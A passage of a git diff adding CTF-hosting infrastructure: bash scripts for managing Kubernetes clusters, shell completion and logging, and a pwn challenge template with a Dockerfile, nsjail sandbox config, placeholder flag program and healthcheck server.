"${KCTF_BIN}/kind" get kubeconfig --name "${CLUSTER_NAME}" >/dev/null 2>/dev/null; then + "${KCTF_BIN}/kind" create cluster --name "${CLUSTER_NAME}" || return + fi + + "${KCTF_BIN}/kubectl" create namespace "kctf-system" --dry-run=client -oyaml | "${KCTF_BIN}/kubectl" apply -f - >&2 || return + + create_operator + + "${KCTF_BIN}/kubectl" patch ServiceAccount default --patch "automountServiceAccountToken: false" || return +} + +function kctf_cluster_stop_kind { + "${KCTF_BIN}/kind" delete cluster --name "${CLUSTER_NAME}" || return +} + +function kctf_cluster_stop { + case "${CLUSTER_TYPE}" in + gce) + kctf_cluster_stop_gce || return + return + ;; + kind) + kctf_cluster_stop_kind || return + return + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac +} + +function kctf_cluster_resize_usage { + echo -e "usage: kctf cluster resize [args]" >&2 + echo -e "args:" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --machine-type machine type to use" >&2 + echo -e " to list available types, run: gcloud compute machine-types list --zones=\"${ZONE}\"" >&2 + echo -e " --spot use spot VMs (reduced cost but no availability guarantees)" >&2 + echo -e " --min-nodes (required) minimum number of nodes in the cluster" >&2 + echo -e " --max-nodes (required) maximum number of nodes in the cluster" >&2 + echo -e " --num-nodes (required) initial number of nodes in the cluster" >&2 + echo -e " --pool-name name of the node pool" >&2 + echo -e " --old-pool name of the old pool to replace" >&2 +} + +function kctf_cluster_resize { + if [[ "${CLUSTER_TYPE}" != "gce" ]]; then + _kctf_log_err "only cluster type \"gce\" is supported by resize" + return 1 + fi + + OPTS="h" + LONGOPTS="help,machine-type:,spot,min-nodes:,max-nodes:,num-nodes:,pool-name:,old-pool:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster resize" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_cluster_resize_usage + exit 1 + fi + eval set -- "$PARSED" + + MACHINE_TYPE="n2-standard-4" + SPOT= + MIN_NODES= + MAX_NODES= + NUM_NODES= + NEW_POOL_NAME= + OLD_POOL_NAME= + while true; do + case "$1" in + -h|--help) + kctf_cluster_resize_usage + exit 0 + ;; + --machine-type) + MACHINE_TYPE="$2" + shift 2 + ;; + --spot) + SPOT=1 + shift 1 + ;; + --min-nodes) + MIN_NODES="$2" + shift 2 + ;; + --max-nodes) + MAX_NODES="$2" + shift 2 + ;; + --num-nodes) + NUM_NODES="$2" + shift 2 + ;; + --pool-name) + NEW_POOL_NAME="$2" + shift 2 + ;; + --old-pool) + OLD_POOL_NAME="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_cluster_resize_usage + exit 1 + ;; + esac + done + + if [[ -z "${MIN_NODES}" ]] || [[ -z "${MAX_NODES}" ]] || [[ -z "${NUM_NODES}" ]]; then + _kctf_log_err "Required arguments missing" + kctf_cluster_resize_usage + exit 1 + fi + + if [[ -z "${OLD_POOL_NAME}" ]]; then + OLD_POOL_NAME=$(gcloud container node-pools list --cluster ${CLUSTER_NAME} --format 'value(name)') + if [ $(echo "${OLD_POOL_NAME}" | wc -l) != "1" ]; then + _kctf_log_err 'Multiple node pools found. Please choose which to replace with --old-pool.' + echo '== node pools ==' >&2 + echo "${OLD_POOL_NAME}" >&2 + exit 1 + fi + fi + + if [[ -z "${NEW_POOL_NAME}" ]]; then + NEW_POOL_NAME="${OLD_POOL_NAME}-resized" + fi + + if [ "${OLD_POOL_NAME}" = "${NEW_POOL_NAME}" ]; then + _kctf_log_err "New pool can't have the same name as the old pool." + exit 1 + fi + + if [[ $# -ne 0 ]]; then + _kctf_log_err "Unrecognized arguments \"$@\"." 
+    kctf_cluster_resize_usage
+    exit 1
+  fi
+
+  _kctf_log 'Creating the new node pool'
+  gcloud container node-pools create "${NEW_POOL_NAME}" \
+    --cluster="${CLUSTER_NAME}" \
+    --machine-type="${MACHINE_TYPE}" \
+    ${SPOT:+--spot} \
+    --enable-autorepair \
+    --enable-autoupgrade \
+    --num-nodes="${NUM_NODES}" \
+    --enable-autoscaling \
+    --min-nodes="${MIN_NODES}" \
+    --max-nodes="${MAX_NODES}" || return
+
+  _kctf_log 'Cordoning old nodes'
+  for node in $("${KCTF_BIN}/kubectl" get nodes -l cloud.google.com/gke-nodepool="${OLD_POOL_NAME}" -o=name); do
+    "${KCTF_BIN}/kubectl" cordon "$node" || return
+  done
+
+  _kctf_log 'Draining old nodes'
+  for node in $("${KCTF_BIN}/kubectl" get nodes -l cloud.google.com/gke-nodepool="${OLD_POOL_NAME}" -o=name); do
+    "${KCTF_BIN}/kubectl" drain --force --ignore-daemonsets --delete-local-data --grace-period=10 "$node" || return
+  done
+
+  _kctf_log "Deleting old node pool \"${OLD_POOL_NAME}\""
+  gcloud container node-pools delete "${OLD_POOL_NAME}" --cluster "${CLUSTER_NAME}" || return
+}
+
+function kctf_cluster_usage {
+  echo -e "usage: kctf cluster command" >&2
+  echo -e "available commands:" >&2
+  echo -e "  create:            create a new cluster config" >&2
+  echo -e "  list:              list available cluster configs" >&2
+  echo -e "  load:              load an existing cluster config" >&2
+  echo -e "  start:             start the cluster" >&2
+  echo -e "  stop:              stop the cluster" >&2
+  echo -e "  resize:            resize the cluster" >&2
+  echo -e "  set-src-ip-ranges: allow ranges of IPs to access the services" >&2
+  echo -e "  get-src-ip-ranges: print the current allowed IP ranges" >&2
+}
+
+function check_cluster_name {
+  if [[ -z "${CLUSTER_NAME-}" ]]; then
+    _kctf_log_err "No cluster config loaded. You need to run \"kctf cluster create\" or \"kctf cluster load\" first."
+    exit 1
+  fi
+}
+
+if [[ $# -lt 1 ]]; then
+  _kctf_log_err "unexpected argument count"
+  kctf_cluster_usage
+  exit 1
+fi
+
+case "$1" in
+  -h|--help)
+    kctf_cluster_usage
+    exit 0
+    ;;
+  start)
+    shift
+    check_cluster_name
+    kctf_cluster_start "$@"
+    # This is used for printing DNS settings once again at the end
+    echo "${BYE_MSG}"
+    ;;
+  stop)
+    shift
+    check_cluster_name
+    kctf_cluster_stop "$@"
+    ;;
+  resize)
+    shift
+    check_cluster_name
+    kctf_cluster_resize "$@"
+    ;;
+  create)
+    shift
+    kctf_cluster_create "$@"
+    ;;
+  list)
+    shift
+    kctf_cluster_list "$@"
+    ;;
+  load)
+    shift
+    kctf_cluster_load "$@"
+    ;;
+  set-src-ip-ranges)
+    shift
+    kctf_cluster_ip_ranges "$@"
+    ;;
+  get-src-ip-ranges)
+    shift
+    kctf_cluster_get_ip_ranges "$@"
+    ;;
+  *)
+    _kctf_log_err "unknown command"
+    kctf_cluster_usage
+    exit 1
+    ;;
+esac
diff --git a/v8ctf/kctf/bin/kctf-completion b/v8ctf/kctf/bin/kctf-completion
new file mode 100644
index 00000000..7d3f7d44
--- /dev/null
+++ b/v8ctf/kctf/bin/kctf-completion
@@ -0,0 +1,197 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
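+
+# Bash completion for the kctf wrapper; the "complete -F _kctf_complete kctf"
+# call at the bottom registers it. Under zsh it relies on bashcompinit (set up
+# below). To use it, source this file from your shell, e.g.:
+#   source kctf/bin/kctf-completion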
+ +if [[ -n "${ZSH_VERSION:-}" ]]; then + autoload -U bashcompinit + bashcompinit +fi + +function _kctf_complete_chal_debug() { + if [ "$COMP_CWORD" == "3" ]; then + COMPREPLY=($(compgen -W "--help logs ssh port-forward docker" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + + case "${COMP_WORDS[3]}" in + logs|ssh|docker) + if [ "${PREV_IS_FLAG}" = 1 ]; then + if [ "${PREV_WORD}" = "--container" ]; then + # TODO get containers from challenge.yaml + COMPREPLY=($(compgen -W "challenge healthcheck" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + if [ "${COMP_WORDS[3]}" = "logs" ]; then + COMPREPLY=($(compgen -W "--help --container --tail" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + COMPREPLY=($(compgen -W "--help --container" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + port-forward) + if [ "${PREV_IS_FLAG}" = 1 ]; then + return + fi + COMPREPLY=($(compgen -W "--help --port --local-port" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + *) + return 1 + ;; + esac +} + +function _kctf_complete_chal() { + if [ "$COMP_CWORD" == "2" ]; then + COMPREPLY=($(compgen -W "--help create list start stop status debug" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + + case "${COMP_WORDS[2]}" in + list) + return + ;; + create) + if [ "${PREV_IS_FLAG}" = 1 ]; then + if [ "${PREV_WORD}" == "--challenge-dir" ]; then + COMPREPLY=($(compgen -d -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--template" ]; then + COMPREPLY=($(compgen -W "list $(ls ${KCTF_CTF_DIR}/kctf/challenge-templates/)" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + COMPREPLY=($(compgen -W "--help --template --challenge-dir" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + start|stop|status) + COMPREPLY=($(compgen -W "--help" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + debug) + _kctf_complete_chal_debug + return + ;; + *) + return 1 + ;; + esac +} + +# This will be out of date at some point, but still useful so worth it? 
+# We can't fetch it easily with gcloud unfortunately since it requires a project +GCP_REGIONS="us-east1-b us-east1-c us-east1-d us-east4-c us-east4-b us-east4-a us-central1-c us-central1-a us-central1-f us-central1-b us-west1-b us-west1-c us-west1-a europe-west4-a europe-west4-b europe-west4-c europe-west1-b europe-west1-d europe-west1-c europe-west3-c europe-west3-a europe-west3-b europe-west2-c europe-west2-b europe-west2-a asia-east1-b asia-east1-a asia-east1-c asia-southeast1-b asia-southeast1-a asia-southeast1-c asia-northeast1-b asia-northeast1-c asia-northeast1-a asia-south1-c asia-south1-b asia-south1-a australia-southeast1-b australia-southeast1-c australia-southeast1-a southamerica-east1-b southamerica-east1-c southamerica-east1-a asia-east2-a asia-east2-b asia-east2-c asia-northeast2-a asia-northeast2-b asia-northeast2-c asia-northeast3-a asia-northeast3-b asia-northeast3-c asia-southeast2-a asia-southeast2-b asia-southeast2-c europe-north1-a europe-north1-b europe-north1-c europe-west6-a europe-west6-b europe-west6-c northamerica-northeast1-a northamerica-northeast1-b northamerica-northeast1-c us-west2-a us-west2-b us-west2-c us-west3-a us-west3-b us-west3-c us-west4-a us-west4-b us-west4-c" +GCP_REGISTRIES="gcr.io asia.gcr.io eu.gcr.io us.gcr.io" + +function _kctf_complete_cluster() { + if [ "$COMP_CWORD" == "2" ]; then + COMPREPLY=($(compgen -W "--help start stop resize create load list set-src-ip-ranges get-src-ip-ranges" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + + case "${COMP_WORDS[2]}" in + start|stop) + COMPREPLY=($(compgen -W "--help --disable-src-ranges" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + resize) + if [ "${PREV_IS_FLAG}" = 1 ]; then + if [ "${PREV_WORD}" == "--old-pool" ]; then + COMPREPLY=($(compgen -W "$(gcloud container node-pools list --cluster ${CLUSTER_NAME} --format 'get(name)')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--machine-type" ]; then + COMPREPLY=($(compgen -W "$(gcloud compute machine-types list --zones="${ZONE}" --format 'get(name)')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + COMPREPLY=($(compgen -W "--machine-type --spot --min-nodes --max-nodes --num-nodes --pool-name --old-pool" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + create) + if [ "${PREV_IS_FLAG}" = 1 ] && [ "${PREV_WORD}" != "--start" ] && [ "${PREV_WORD}" != "--disable-src-ranges" ]; then + if [ "${PREV_WORD}" == "--type" ]; then + COMPREPLY=($(compgen -W "gce kind" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--project" ]; then + COMPREPLY=($(compgen -W "$(gcloud projects list --format 'get(project_id)')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--zone" ]; then + COMPREPLY=($(compgen -W "${GCP_REGIONS}" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--registry" ]; then + COMPREPLY=($(compgen -W "${GCP_REGISTRIES}" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--domain-name" ]; then + COMPREPLY=($(compgen -W "none" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + COMPREPLY=($(compgen -W "--help --type --project --zone --registry --cluster-name --domain-name --email-address --start --disable-src-ranges" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + load) + if [ "${COMP_CWORD}" == "3" ]; then + COMPREPLY=($(compgen -W "$(find ${KCTF_CTF_DIR}/kctf/config/ -type f -printf '%f\n')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + ;; + 
list)
+      return 0
+      ;;
+    set-src-ip-ranges)
+      return 0
+      ;;
+    *)
+      return 1
+      ;;
+  esac
+}
+
+function _kctf_complete() {
+  if [ "$COMP_CWORD" == "1" ]; then
+    COMPREPLY=($(compgen -W "--help chal cluster" -- "${COMP_WORDS[${COMP_CWORD}]}"))
+    return
+  fi
+  PREV_WORD="${COMP_WORDS[$(($COMP_CWORD - 1))]}"
+  if [ "${PREV_WORD:0:1}" = "-" ]; then
+    PREV_IS_FLAG="1"
+  else
+    PREV_IS_FLAG="0"
+  fi
+  case "${COMP_WORDS[1]}" in
+    chal)
+      _kctf_complete_chal
+      return
+      ;;
+    cluster)
+      _kctf_complete_cluster
+      return
+      ;;
+    *)
+      return 1
+      ;;
+  esac
+}
+complete -F _kctf_complete kctf
diff --git a/v8ctf/kctf/bin/kctf-log b/v8ctf/kctf/bin/kctf-log
new file mode 100644
index 00000000..94929248
--- /dev/null
+++ b/v8ctf/kctf/bin/kctf-log
@@ -0,0 +1,35 @@
+#!/bin/bash
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+_KCTF_COLOR_RED=$'\e[0;31m'
+_KCTF_COLOR_GREEN=$'\e[0;32m'
+_KCTF_COLOR_YELLOW=$'\e[0;33m'
+_KCTF_COLOR_END=$'\e[0m'
+
+function _kctf_log {
+  echo -n "${_KCTF_COLOR_GREEN}[*]${_KCTF_COLOR_END} " >&2
+  echo "$@" >&2
+}
+
+function _kctf_log_warn {
+  echo -n "${_KCTF_COLOR_YELLOW}[W]${_KCTF_COLOR_END} " >&2
+  echo "$@" >&2
+}
+
+function _kctf_log_err {
+  echo -n "${_KCTF_COLOR_RED}[E]${_KCTF_COLOR_END} " >&2
+  echo "$@" >&2
+}
+
diff --git a/v8ctf/kctf/challenge-templates/pwn/README.md b/v8ctf/kctf/challenge-templates/pwn/README.md
new file mode 100644
index 00000000..44415f63
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/README.md
@@ -0,0 +1,55 @@
+# Quickstart guide to writing a challenge
+
+The basic steps when preparing a challenge are:
+
+* A Docker image is built from the `challenge` directory. For the simplest challenges, replacing `challenge/chal.c` is sufficient.
+* Edit `challenge/Dockerfile` to change the commandline or the files you want to include.
+* To try the challenge locally, you will need to
+  * create a local cluster with `kctf cluster create --type kind --start $configname`
+  * build the challenge binary with `make -C challenge`
+  * and then deploy the challenge with `kctf chal start`
+* To access the challenge, create a port forward with `kctf chal debug port-forward` and connect to it via `nc localhost PORT` using the printed port.
+* Check out `kctf chal <tab>` for more commands.
+
+## Directory layout
+
+The following files/directories are available:
+
+### /challenge.yaml
+
+`challenge.yaml` is the main configuration file. You can use it to change
+settings like the name and namespace of the challenge, the exposed ports, the
+proof-of-work difficulty etc.
+For documentation on the available fields, you can run `kubectl explain challenge` and
+`kubectl explain challenge.spec`.
+
+### /challenge
+
+The `challenge` directory contains a Dockerfile that describes the challenge and
+any challenge files. This template comes with a Makefile to build the challenge,
+which is the recommended way for pwnables if the deployed binary matters, e.g.
+if you hand it out as an attachment for ROP gadgets.
+If the binary layout doesn't matter, you can build it using an intermediate
+container as part of the Dockerfile, similar to how the chroot is created.
+
+### /healthcheck
+
+The `healthcheck` directory is optional. If you don't want to write a healthcheck, feel free to delete it. However, we strongly recommend that you implement a healthcheck :).
+
+We provide a basic healthcheck skeleton that uses pwntools to implement the
+healthcheck code. The only requirement is that the healthcheck replies to GET
+requests to http://$host:45281/healthz with either a success or an error status
+code.
+
+In most cases, you will only have to modify `healthcheck/healthcheck.py`.
+
+## API contract
+
+Make sure your setup fulfills the following requirements so that it works with kCTF:
+
+* Verify `kctf_setup` is used as the first command in the CMD instruction of your `challenge/Dockerfile`.
+* You can do pretty much whatever you want in the `challenge` directory but:
+* We strongly recommend using nsjail in all challenges. While nsjail is already installed, you need to configure it in `challenge/nsjail.cfg`. For more information on nsjail, see the [official website](https://nsjail.dev/).
+* Your challenge receives connections on port 1337. The port can be changed in `challenge.yaml`.
+* The healthcheck directory is optional.
+  * If it exists, the image should run a webserver on port 45281 and respond to `/healthz` requests.
diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge.yaml b/v8ctf/kctf/challenge-templates/pwn/challenge.yaml
new file mode 100644
index 00000000..3815d941
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/challenge.yaml
@@ -0,0 +1,12 @@
+apiVersion: kctf.dev/v1
+kind: Challenge
+metadata:
+  name: pwn
+spec:
+  deployed: true
+  powDifficultySeconds: 0
+  network:
+    public: false
+  healthcheck:
+    # TIP: disable the healthcheck during development
+    enabled: true
diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/Dockerfile b/v8ctf/kctf/challenge-templates/pwn/challenge/Dockerfile
new file mode 100644
index 00000000..973a386b
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/challenge/Dockerfile
@@ -0,0 +1,31 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
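+
+# Layout of this Dockerfile: the "chroot" stage below builds the filesystem
+# that the challenge runs in, and the kctf challenge base image then serves
+# /chroot via socat, wrapping each connection in kctf_pow (proof of work)
+# and nsjail (see the CMD at the bottom).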
+FROM ubuntu:20.04 as chroot
+
+RUN /usr/sbin/useradd --no-create-home -u 1000 user
+
+COPY flag /
+COPY chal /home/user/
+
+FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f
+
+COPY --from=chroot / /chroot
+
+COPY nsjail.cfg /home/user/
+
+CMD kctf_setup && \
+    kctf_drop_privs \
+    socat \
+      TCP-LISTEN:1337,reuseaddr,fork \
+      EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/chal"
diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/Makefile b/v8ctf/kctf/challenge-templates/pwn/challenge/Makefile
new file mode 100644
index 00000000..455cb5fa
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/challenge/Makefile
@@ -0,0 +1,3 @@
+LDFLAGS=-static
+
+chal: chal.c
diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/chal.c b/v8ctf/kctf/challenge-templates/pwn/challenge/chal.c
new file mode 100644
index 00000000..808f87bb
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/challenge/chal.c
@@ -0,0 +1,6 @@
+#include <stdlib.h>
+
+int main(int argc, char *argv[]) {
+  system("cat /flag");
+  return 0;
+}
diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/flag b/v8ctf/kctf/challenge-templates/pwn/challenge/flag
new file mode 100644
index 00000000..9ecc2ebf
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/challenge/flag
@@ -0,0 +1 @@
+CTF{TestFlag}
\ No newline at end of file
diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/nsjail.cfg b/v8ctf/kctf/challenge-templates/pwn/challenge/nsjail.cfg
new file mode 100644
index 00000000..c66b20f9
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/challenge/nsjail.cfg
@@ -0,0 +1,51 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+# See options available at https://github.com/google/nsjail/blob/master/config.proto
+
+name: "default-nsjail-configuration"
+description: "Default nsjail configuration for pwnable-style CTF task."
+
+mode: ONCE
+uidmap {inside_id: "1000"}
+gidmap {inside_id: "1000"}
+rlimit_as_type: HARD
+rlimit_cpu_type: HARD
+rlimit_nofile_type: HARD
+rlimit_nproc_type: HARD
+
+cwd: "/home/user"
+
+mount: [
+  {
+    src: "/chroot"
+    dst: "/"
+    is_bind: true
+  },
+  {
+    dst: "/tmp"
+    fstype: "tmpfs"
+    rw: true
+  },
+  {
+    dst: "/proc"
+    fstype: "proc"
+    rw: true
+  },
+  {
+    src: "/etc/resolv.conf"
+    dst: "/etc/resolv.conf"
+    is_bind: true
+  }
+]
diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/Dockerfile b/v8ctf/kctf/challenge-templates/pwn/healthcheck/Dockerfile
new file mode 100644
index 00000000..2df56306
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/Dockerfile
@@ -0,0 +1,18 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0
+
+COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/
+
+CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py
diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/README.md b/v8ctf/kctf/challenge-templates/pwn/healthcheck/README.md
new file mode 100644
index 00000000..8dbcd6a8
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/README.md
@@ -0,0 +1,14 @@
+# Healthcheck
+
+kCTF checks the health of challenges by accessing the healthcheck via
+http://host:45281/healthz, which needs to return either 200 OK or an error,
+depending on the status of the challenge.
+
+The default healthcheck consists of:
+* a loop that repeatedly calls a python script and writes the status to a file
+* a webserver that checks the file and serves /healthz
+* the actual healthcheck code using pwntools for convenience
+
+To modify it, you will likely only have to change the script in healthcheck.py.
+You can test whether the challenge replies as expected or, better, add a full
+example solution that tries to get the flag from the challenge.
diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck.py b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck.py
new file mode 100755
index 00000000..e4b2c2c9
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck.py
@@ -0,0 +1,36 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
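+
+# Overall flow: connect to the challenge on localhost:1337, solve the optional
+# kctf proof-of-work with the kctf_bypass_pow helper (assumed to be provided
+# by the healthcheck base image), then verify that the flag gets printed.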
+
+import pwnlib.tubes
+
+def handle_pow(r):
+    print(r.recvuntil(b'python3 '))
+    print(r.recvuntil(b' solve '))
+    challenge = r.recvline().decode('ascii').strip()
+    p = pwnlib.tubes.process.process(['kctf_bypass_pow', challenge])
+    solution = p.readall().strip()
+    r.sendline(solution)
+    print(r.recvuntil(b'Correct\n'))
+
+r = pwnlib.tubes.remote.remote('127.0.0.1', 1337)
+print(r.recvuntil(b'== proof-of-work: '))
+if r.recvline().startswith(b'enabled'):
+    handle_pow(r)
+
+print(r.recvuntil(b'CTF{'))
+print(r.recvuntil(b'}'))
+
+exit(0)
diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck_loop.sh b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck_loop.sh
new file mode 100755
index 00000000..acf69158
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck_loop.sh
@@ -0,0 +1,32 @@
+#!/bin/bash
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+set -Eeuo pipefail
+
+TIMEOUT=20
+PERIOD=30
+
+export TERM=linux
+export TERMINFO=/etc/terminfo
+
+while true; do
+  echo -n "[$(date)] "
+  if timeout "${TIMEOUT}" /home/user/healthcheck.py; then
+    echo 'ok' | tee /tmp/healthz
+  else
+    echo -n "$? "
+    echo 'err' | tee /tmp/healthz
+  fi
+  sleep "${PERIOD}"
+done
diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthz_webserver.py b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthz_webserver.py
new file mode 100755
index 00000000..62cf0198
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthz_webserver.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
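+
+# Minimal status webserver backing the healthcheck contract: answers GET
+# /healthz on port 45281 with 200 if /tmp/healthz (written by
+# healthcheck_loop.sh) reads "ok", and 400 otherwise.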
+import http.server
+
+class HealthzHandler(http.server.BaseHTTPRequestHandler):
+    def do_GET(self):
+        if self.path != '/healthz':
+            self.send_response(404)
+            self.send_header("Content-length", "0")
+            self.end_headers()
+            return
+
+        content = b'err'
+        try:
+            with open('/tmp/healthz', 'rb') as fd:
+                content = fd.read().strip()
+        except:
+            pass
+        self.send_response(200 if content == b'ok' else 400)
+        self.send_header("Content-type", "text/plain")
+        self.send_header("Content-length", str(len(content)))
+        self.end_headers()
+        self.wfile.write(content)
+
+httpd = http.server.HTTPServer(('', 45281), HealthzHandler)
+httpd.serve_forever()
diff --git a/v8ctf/kctf/challenge-templates/web/README.md b/v8ctf/kctf/challenge-templates/web/README.md
new file mode 100644
index 00000000..a5cf4249
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/README.md
@@ -0,0 +1,90 @@
+# Quickstart guide to writing a challenge
+
+The basic steps when preparing a challenge are:
+
+* A Docker image is built from the `challenge` directory. For the simplest challenges, replacing the sample apps under `challenge/web-apps` is sufficient.
+* Edit `challenge/Dockerfile` to change the commandline or the files you want to include.
+* To try the challenge locally, you will need to
+  * create a local cluster with `kctf cluster create --type kind --start $configname`
+  * and then deploy the challenge with `kctf chal start`
+* To access the challenge, create a port forward with `kctf chal debug port-forward` and connect to it via `nc localhost PORT` using the printed port.
+* Check out `kctf chal <tab>` for more commands.
+
+## Sandboxing
+
